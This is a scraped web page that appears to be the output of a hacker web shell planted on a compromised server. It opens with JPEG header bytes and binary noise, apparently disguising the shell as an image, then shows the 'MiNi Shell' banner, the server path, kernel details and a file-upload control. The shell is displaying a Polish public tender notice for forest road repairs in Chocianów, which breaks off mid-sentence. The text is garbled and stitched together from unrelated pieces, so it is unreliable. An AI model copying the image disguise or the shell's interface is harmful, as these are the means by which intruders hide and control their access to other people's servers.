JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230920/0040573101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa stanu technicznego nawierzchni drogi leśnej w Leśnictwie Chocianów oddz. 94 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Chocianów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931023902</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chocianów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768183500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">chocianow@wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/nadlesnictwo-chocianow/zamowienia-publiczne</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa stanu technicznego nawierzchni drogi leśnej w Leśnictwie Chocianów oddz. 94 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6ebdd1d9-57a8-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00405731</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6ebdd1d9-57a8-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.gov.pl/web/nadlesnictwo-chocianow/zamowienia-publiczne</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">6.2. Sposób komunikowania się<br/>Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania ofert):<br/>a) Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, za pośrednictwem<br/>formularzy do komunikacji dostępnych pod internetowym adresem: https://ezamowienia.gov.pl oraz poczty elektronicznej<br/>Zamawiającego, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu Platformy.<br/>b) Korzystanie z Platformy jest bezpłatne.<br/>c) Zamawiający dopuszcza również komunikację z Wykonawcami za pomocą poczty elektronicznej pod adresem e-mail:<br/>chocianow@wroclaw.lasy.gov.pl z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu Platformy.<br/>d) Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną zapisanej w<br/>postaci papierowej (cyfrowe odwzorowanie), przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r. poz. 2452).<br/>6.3. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać<br/>aktywne konto podmiotu „Wykonawca” na Platformie.<br/>6.4. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy, w tym minimalne<br/>wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów<br/>w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w „Regulaminie korzystania z Platformy e-Zamówienia”, dostępnym pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia, akceptuje<br/>te wymagania oraz warunki korzystania z Platformy.<br/>6.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>6.6. Zamawiający przekazuje link do postępowania oraz identyfikator postępowania generowany przez Portal jako załączniki nr 1 do<br/>SWZ.<br/>6.7. Dane postępowania można wyszukać na liście postępowań opublikowanych na Portalu w zakładce „Postępowania&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z punktem 32 Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.111.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty polegające na poprawie stanu technicznego nawierzchni drogi leśnej na terenie<br/>Leśnictwa Chocianów, w oddziale 94. Zakres prac obejmuje:<br/>-mechaniczne profilowanie nawierzchni drogi; powierzchnia 3711,00 m2;<br/>-uzupełnianie kolein i dołów za pomocą kruszywa kamiennego tłucznia frakcji 31,5-63 mm; rodzaj kruszywa: granitowe lub<br/>Ogłoszenie nr 2023/BZP 00405459/01 z dnia 2023-09-20<br/>2023-09-20 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>bazaltowe; powierzchnia: 720,00 m2; (szacowana ilość kruszywa 572 tony);<br/>-uzupełnienie nawierzchni drogi za pomocą kruszywa kamiennego – niesort kamienny frakcji 0-31,5 mm i średniej grubości<br/>warstwy około 6 cm po zagęszczeniu mechanicznym; rodzaj kruszywa: granitowe lub bazaltowe.; powierzchnia: 3150,00 m2<br/>(szacowana ilość kruszywa: 794 tony)<br/>-odtworzenie rowu melioracyjnego wraz z odmuleniem na odcinku 650 mb; rów o szerokości dna ok. 40 cm i głębokości<br/>poniżej 1 m oraz z wykoszeniem porostów ze skarp i dna rowu na powierzchni 1040 m2.<br/>Szczegółowego opisu przedmiotu zamówienia dokonano w załączniku nr 1 do SWZ – Opis przedmiotu zamówienia i<br/>przedmiar robót kosztorysu inwestorskiego, które stanowią integralną część niniejszego SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233141-9 - Roboty w zakresie konserwacji dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">12.1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami<br/>oceny ofert:<br/>a) Cena (waga 60%)<br/>b) Gwarancja (kryterium jakościowe) (waga 40%)<br/>12.2. Oferty będą oceniane metodą punktową. Maksymalna, łączna ilość punktów, jaką można uzyskać według powyższych<br/>kryteriów wynosi 100,00 pkt. Uzyskana z wyliczenia ilość punktów zostanie ustalona z dokładnością do drugiego miejsca po<br/>przecinku z zachowaniem zasady zaokrągleń matematycznych.<br/>12.3. Sposób obliczenia punktów dla kryterium „Cena”:<br/>a) Ilość punktów wylicza się ze wzoru:<br/>Liczba punktów w ramach kryterium „Cena” = (całkowita cena brutto najtańszej oferty / całkowita cena brutto badanej oferty) x 100<br/>pkt x 60 %<br/>b) Ocenie w ramach kryterium „Cena” podlegać będzie całkowita cena brutto podana w formularzu Oferty.<br/>c) W kryterium „Cena”, oferta może otrzymać maksymalnie 60,00 pkt.<br/>d) Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>12.4. Sposób obliczenia punktów dla kryterium „Gwarancja”<br/>a) Wykonawca podaje w formularzu ofertowym okres udzielonej gwarancji w pełnych miesiącach. Minimalny okres gwarancji wynosi<br/>24 miesięcy.<br/>b) W przypadku nie podania w formularzu Oferty okresu gwarancji, Zamawiający uzna, że wykonawca udzieli Zamawiającemu<br/>gwarancji na wykonane prace na okres 24 miesięcy.<br/>c) Zamawiający przyzna za poszczególne okresy udzielonej gwarancji niżej wymienione punkty:<br/>24 miesięcy - 0 pkt;<br/>30 miesięcy - 20 pkt;<br/>36 miesiące i więcej – 40 pkt.<br/>12.5. Za najkorzystniejszą ofertę Zamawiający uznana ofertę wykonawcy, która uzyska największą łączną liczbę punktów<br/>uzyskanych z obu kryteriów.<br/>12.6. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans<br/>ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą<br/>ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający wzywa do<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających<br/>nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1)zdolności do występowania w obrocie gospodarczym – zamawiający uzna, że wykonawca spełnia ww. warunek, jeżeli<br/>wykonawca będzie wpisany do jednego z rejestrów: Krajowego Rejestru Sądowego (KRS), Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej (CEIDG) lub innego rejestru prowadzonego w państwie członkowskim Unii Europejskiej, w<br/>którym posiada siedzibę lub miejsce zamieszkania.<br/>2)zdolności technicznej lub zawodowej – zamawiający uzna, że wykonawca spełnia ww. warunek, jeżeli wykonawca<br/>wykaże, że w okresie ostatnich 5 lat od dnia, w którym mija termin składania ofert (a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie) wykonał co najmniej jedno zamówienia o wartości co najmniej 100 000,00 zł brutto, obejmujące<br/>swym zakresem roboty rodzajowo takie same lub podobne do robót stanowiących przedmiot niniejszego postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- Zgodnie z art. 125 ust. 1<br/>ustawy Pzp, w celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w pkt. 10 SWZ wykonawca<br/>składa wraz z ofertą oświadczenie sporządzone zgodnie z załącznikiem nr 5 do SWZ dokumentów;<br/>-oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2020 r. poz. 1076 z późn.<br/>zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie należy złożyć zgodnie z załącznikiem nr 6 do SWZ.<br/>-oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP (oświadczenie o<br/>braku podstaw do wykluczenia), w zakresie podstaw wykluczenia z postępowania określonych w: art. 108 ust. 1 pkt 3 ustawy Pzp;<br/>art. 108 ust. 1 pkt 4 ustawy Pzp; art. 108 ust. 1 pkt 5 ustawy Pzp; art. 108 ust. 1 pkt 6 ustawy Pzp. Oświadczenie należy złożyć<br/>zgodnie z załącznikiem nr 7 do SWZ.<br/>-f) informację z Krajowego Rejestru Karnego w zakresie: art. 108 ust. 1 pkt 1 i 2 PZP, art. 108 ust.1 pkt 4 PZP, odnośnie do<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego – wystawioną nie wcześniej niż 6 miesięcy przed<br/>jej złożeniem;<br/>16.5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o<br/>których mowa w SWZ pkt 16.4. lit. f) – składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo w przypadku<br/>braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie określonym art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp.<br/>16.6. Dokument, o którym mowa w pkt 16.5. SWZ powinien być wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>16.7. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w<br/>pkt. 16.5., lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp,<br/>zastępuje się je w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby<br/>albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/>jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie przepisów o oświadczeniu pod przysięgą, złożone<br/>przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania wykonawcy. Postanowienia pkt. 16.6. stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">: Zgodnie<br/>z art. 125 ust. 1 ustawy Pzp, w celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w pkt. 15<br/>SWZ wykonawca składa wraz z ofertą oświadczenie sporządzone zgodnie z załącznikiem nr 4 do SWZ.<br/>- odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru, wstawionego nie wcześniej niż 3 miesiące przed jej złożeniem. Wykonawca nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów;<br/>- wykaz wykonywanych robót, sporządzony zgodnie z załącznikiem nr 8 do SWZ potwierdzający spełnienie przez wykonawcę<br/>warunku udziału w postępowaniu;<br/>- dowody określające, że wskazane przez wykonawcę w załączniku nr 8 do SWZ roboty zostały wykonane należycie. Dowodami, o<br/>których mowa są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego roboty były wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>potwierdzające należyte wykonanie wskazanych robót;<br/>- zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu<br/>polega na zdolnościach lub sytuacji innych podmiotów. Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 9 do SWZ; (jeżeli dotyczy)<br/>- oświadczenie podmiotu udostępniającego zasoby o spełnieniu warunków udziału w postępowaniu, sporządzone zgodnie z załącznikiem nr 10 do SWZ; (jeżeli dotyczy)<br/>- oświadczenie podmiotu udostępniającego zasoby o braku podstaw do wykluczenia, sporządzone zgodnie z załącznikiem nr 11 do<br/>SWZ; (jeżeli dotyczy);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 16.4. Zgodnie z art. 274 ust. 1 ustawy Pzp, w celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz braku<br/>podstaw do wykluczenia z postępowania, zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych,<br/>aktualnych na dzień ich składania, tj.:<br/>a) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, wstawionego nie wcześniej niż 3 miesiące przed jej złożeniem. Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych<br/>dokumentów;<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2020 r. poz. 1076 z<br/>późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie należy złożyć zgodnie z<br/>załącznikiem nr 6 do SWZ.<br/>c) oświadczenia 